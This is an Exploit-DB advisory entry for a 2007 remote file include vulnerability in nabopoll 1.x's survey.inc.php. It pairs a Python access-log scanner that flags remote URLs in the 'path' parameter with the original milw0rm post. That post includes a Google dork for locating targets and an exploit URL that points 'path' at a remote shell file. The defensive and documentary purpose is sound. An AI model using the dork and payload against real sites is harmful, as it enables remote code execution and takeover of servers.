vendor: nabopoll
by: Cr@zy_King
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: nabopoll
Affected Version From: nabopoll 1.x
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Include

This vulnerability allows an attacker to include remote files by manipulating the 'path' parameter of the 'survey.inc.php' file in the 'nabopoll' script. The file prepends 'path' to its include_once() calls, so by supplying a malicious URL as the 'path' parameter an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the 'nabopoll' script or apply the necessary security measures to prevent unauthorized file inclusion.
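
One way to spot requests of this kind in web server access logs, as an added example that is not part of the original advisory. It assumes combined-format log lines; the sample lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target inside a combined-format access log line (format assumed).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Value starting with a URL scheme (http:, ftp:, php:, data: ...) or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.I)
TARGET_SCRIPT = "survey.inc.php"  # file named in the advisory
TARGET_PARAM = "path"             # parameter named in the advisory

# Constructed sample lines (documentation addresses, reserved host name).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Feb/2007:10:00:00 +0000] "GET /nabopoll/survey.inc.php?path=http://files.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [15/Feb/2007:10:00:02 +0000] "GET /nabopoll/survey.inc.php?path=%2568ttp%253A%252F%252Ffiles.example%252Fx HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Feb/2007:10:01:00 +0000] "GET /nabopoll/ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [15/Feb/2007:10:01:05 +0000] "GET /nabopoll/survey.inc.php?path=includes/ HTTP/1.1" 200 90',
]


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_rfi_attempt(log_line):
    """True if the line requests survey.inc.php with a remote-looking 'path'."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    url = urlsplit(match.group(1))
    if not fully_unquote(url.path).lower().endswith("/" + TARGET_SCRIPT):
        return False
    # parse_qsl decodes once; fully_unquote peels any further encoding layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == TARGET_PARAM and REMOTE_RE.match(fully_unquote(value)):
            return True
    return False


def find_rfi_attempts(lines):
    """Return the log lines that match the pattern described in the advisory."""
    return [line for line in lines if is_rfi_attempt(line)]
```

A relative value such as `path=includes/` is not flagged by this check, but any request that sets 'path' on survey.inc.php directly is still worth reviewing.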
Source

Exploit-DB raw data:

By Cr@zy_King

crazy_king@eno7.org

Thanks : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File Include | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present

# milw0rm.com [2007-02-15]